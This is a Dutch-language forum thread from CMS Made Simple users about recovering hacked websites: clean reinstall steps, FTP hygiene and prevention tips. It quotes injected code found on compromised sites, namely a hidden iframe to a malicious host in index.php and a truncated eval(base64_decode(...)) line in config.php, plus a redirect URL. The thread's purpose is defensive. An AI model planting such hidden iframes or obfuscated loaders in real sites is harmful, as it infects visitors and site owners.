CMS Made Simple Forums
https://forum.cmsmadesimple.org/

Wat stappen om een gehackte website te redden
https://forum.cmsmadesimple.org/viewtopic.php?f=52&t=45525
Page 1 of 1

Author:  Rolf [ Fri Jul 09, 2010 2:07 pm ]
Post subject:  Wat stappen om een gehackte website te redden

De website doet raar, geeft witte schermen, vreemde foutmeldingen in de browser, virusscanners geven meldingen bij een bezoek aan je website... Allemaal mogelijke tekenen voor een (ftp) gehackte website  :(

Kijk je in de broncode van de CMS bestanden, dan zie je vaak vreemde code tussen de normale code staan. Bijvoorbeeld in de root index.php:

Code:
else if (file_exists(TMP_CACHE_LOCATION.'/SITEDOWN'))
{
   echo "< html>< head><title>Maintenance</title></head>< body>< iframe src="http;//abcde,ru:8080/index.php" width=157 height=142 style="visibility: hidden">< /iframe><p>Site down for maintenance.</p>< /body>< /html>";
   exit;
}

Voor de duidelijkheid het stuk tussen de iframe tags hoort daar niet te staan!
Het zet een, voor het oog niet zichtbaar iframe op je website. Maar de zoekmachines zien hem wel, bijvoorbeeld een manier om meer verwijzingen naar een site te krijgen en een hogere PageRank te genereren. Of het wordt gebruikt om malware of spam te verzenden, enz. enz.

Ergens op jouw server staan één of meerdere scripts (PHP-bestandjes) die de iFrames in jouw CMSMS bestanden zet.
Bekijk maar eens wat bestanden op de server, let hierbij op de laatste wijzigingsdatum. Over het algemeen zullen de bestanden dezelfde datum hebben: datum installatie of datum upgrade.
Veel van de dummy index.html files blijken vaak gewijzigd.

Raadpleeg in ieder geval de provider, zij kunnen (mogelijk) preventieve acties ondernemen.

Wijzig FTP-inloggegevens met sterkte wachtwoorden, bijv. "fhSDt34&FGyQ" of iets dergelijks, maar zeker niet zoiets als "henk01".
Voor de zekerheid kun je ook altijd de Admin inloggegevens nog even wijzigen. Al zal dat waarschijnlijk niet nodig zijn.

Door het maken van een back-up op een PC met een goed Internet Security pakket zou je deze niet-CMSMS bestanden wel kunnen vinden en verwijderen.
Maar het vinden van alle aangepaste/beschadigde bestanden is ondoenlijk...
Een CMSMS pakket bestaat uit duizenden bestanden.

Heb een aantal van deze acties op het forum bij de hand gehad.
De conclusie hier was dat er eigenlijk maar twee opties zijn.

1. Terugzetten van een back-up set die niet gehackt is, maar hierbij is het probleem: hoe weet je dit zeker? Heb een site gezien die al jaren geplaagd werd met dit soort zaken, stiekem zat er toch nog ergens een fout bestandje verstopt...

2. Met een schone lei beginnen...
- Zorg voor een goede back-up van de huidige bestanden en database!
- Maak een kopie van de Systeem Informatie voor een overzicht van de geïnstalleerde modules.
- Verwijder alle bestanden van de server, maar laat de database gewoon bestaan!
- Installeer een nieuwe CMSMS versie (die ook geïnstalleerd was) mét de nog bestaande database!
Maar let goed op wat je doet tijdens het installeren, kies NIET voor het aanmaken van tabellen en standaard inhoud in de database in stap 5. Anders wordt alles overschreven.
Let goed op wat je doet...
- Download en unzip de gebruikte modules naar de eigen pc, en upload deze daarna via FTP terug op de webserver.

Na het nieuw aanmaken van het CMS, kun je alle afbeeldingen e.d. terugplaatsen.
Doe dit handmatig en eigenlijk stuk voor stuk. Volledige mappen terugzetten heeft als risico dat er nog een fout bestandje in kan zitten en dan ben je weer terug bij af...

Alle bestanden zijn nu nieuw en de site kan weer zonder enige risico op gehackte files verder draaien.  :)


Hoe kun je een gehackte website voorkomen?

100% Garantie krijgt niemand, maar je kunt wel je best doen...

- Goede, betrouwbare host. Goedkoop kan wel eens duurkoop zijn.
- Sterke FTP loginnaam en wachtwoord (Tip: http://howsecureismypassword.net/)
- Zorg voor een up-to-date virusscanner op je eigen PC. Een virus kan vanuit je PC meeliften als je bestanden upload.
- Regelmatig back-ups van de website maken. Door het maken van deze back-up scant de virusscanner de bestanden op de server en zal een eventuele hack snel worden gedetecteerd en de schade minimaal blijven.
- Gebruik de laatste versies van CMS Made Simple en de modules. Upgraden dus!

Succes,

Rolf

Author:  Rene NL [ Thu Aug 19, 2010 11:29 pm ]
Post subject:  Re: Wat stappen om een gehackte website te redden

Wat betreft filezilla en winscp:

Gebruik voor ftp alleen winscp. Filezilla slaat namelijk de paswords in plaintekst op. Er zijn trojans die deze verzamelen en uitlezen.

Beter is het om winscp te gebruiken met een master password wat de ftp passwords weer versleuteld.  8)
En zoals Arnoud al aangaf, alleen (indien mogelijk) uploaden via sftp. ;)

Author:  brentnl [ Mon Oct 04, 2010 7:30 am ]
Post subject:  Re: Wat stappen om een gehackte website te redden

Een website van een klant van me is zojuist ook gehacked, alleen enkel via google...

De URL direct intypen werkt gewoon, maar via google zoeken en dan op de link klikken zorgt voor een redirect richting
Code:
p3p0.com/?said=3333g&q=[naamwebsite]
..

Checksum biedt geen oplossing, want ik heb sinds de installatie een hoop gewijzigd. Heb de lib dir geheel vervangen en ook alles files in de root.

Via ftp zie ik geen bestanden die pas gewijzigd zijn oid.

Author:  Rolf [ Mon Oct 04, 2010 7:36 am ]
Post subject:  Re: Wat stappen om een gehackte website te redden

@ brentnl
Welke versie cms gebruik je op deze website?
Heb je een link naar de site?

Grt. Rolf

Author:  brentnl [ Mon Oct 04, 2010 7:40 am ]
Post subject:  Re: Wat stappen om een gehackte website te redden

Rolf wrote:
@ brentnl
Welke versie cms gebruik je op deze website?
Heb je een link naar de site?

Grt. Rolf



CMS 1.8.1 , URL via DM.

Author:  brentnl [ Mon Oct 04, 2010 7:46 am ]
Post subject:  Re: Wat stappen om een gehackte website te redden

het zat toch in config.php, dat was ook de enigste file die ik niet compleet had vernieuwd, maar enkel had doorgekeken. Blijkbaar niet goed genoeg, want er stond een regel in, in de trend van:

Code:
eval(base64_decode("lange string....


het is nu opgelost, nu maar even een nieuw FTP wachtwoord aan vragen..

Author:  Rolf [ Mon Oct 04, 2010 10:04 am ]
Post subject:  Re: Wat stappen om een gehackte website te redden

brentnl wrote:
het zat toch in config.php, dat was ook de enigste file die ik niet compleet had vernieuwd, maar enkel had doorgekeken. Blijkbaar niet goed genoeg, want er stond een regel in, in de trend van:

Code:
eval(base64_decode("lange string....


het is nu opgelost, nu maar even een nieuw FTP wachtwoord aan vragen..

Vraag blijft natuurlijk wel hoe kan iets, of iemand de config.php ongestraft wijzigen?
Was het bestand niet schrijfbeveiligd? (CHMOD444)
Heeft iemand anders toegang gehad via ftp?
Of staat er nog steeds een niet-cmsms-script op de server, en wijzigt deze de bestanden...

Niet om je bang te maken, maar wel om je bewust te maken van wat de oorzaken kunnen zijn...
Heb websites gezien die iedere keer weer werden gehackt, het bleek naderhand dat ze nog steeds waren gehackt. Jaren lang hebben er bestandjes op de server gestaan die de bestanden besmetten...

Grt. Rolf  ;)

Author:  brentnl [ Mon Oct 04, 2010 10:17 am ]
Post subject:  Re: Wat stappen om een gehackte website te redden

Rolf wrote:
Niet om je bang te maken, maar wel om je bewust te maken van wat de oorzaken kunnen zijn...
Heb websites gezien die iedere keer weer werden gehackt, het bleek naderhand dat ze nog steeds waren gehackt. Jaren lang hebben er bestandjes op de server gestaan die de bestanden besmetten...

Grt. Rolf  ;)


Hier ben ik me van bewust ;) Nu heb ik net een nieuw ftp wachtwoord aangevraagd, config.php stond al op 444, op 777 gezet, aangepast en opgeschoond, weer op 444 gezet, en hierna weer het ftp wachtwoord veranderd. hoop dat het nu schoon blijft, heb de meeste bestanden van CMSMS vervangen door de originele files, dus hoop dat het nu rustig blijft..

wel een sneaky hack trouwens, enkel via zoekmachines redirecten.. het was puur toeval dat ik die website van een klant via google nu nog benaderde.

Page 1 of 1 All times are UTC
Powered by phpBB © 2000, 2002, 2005, 2007 phpBB Group
http://www.phpbb.com/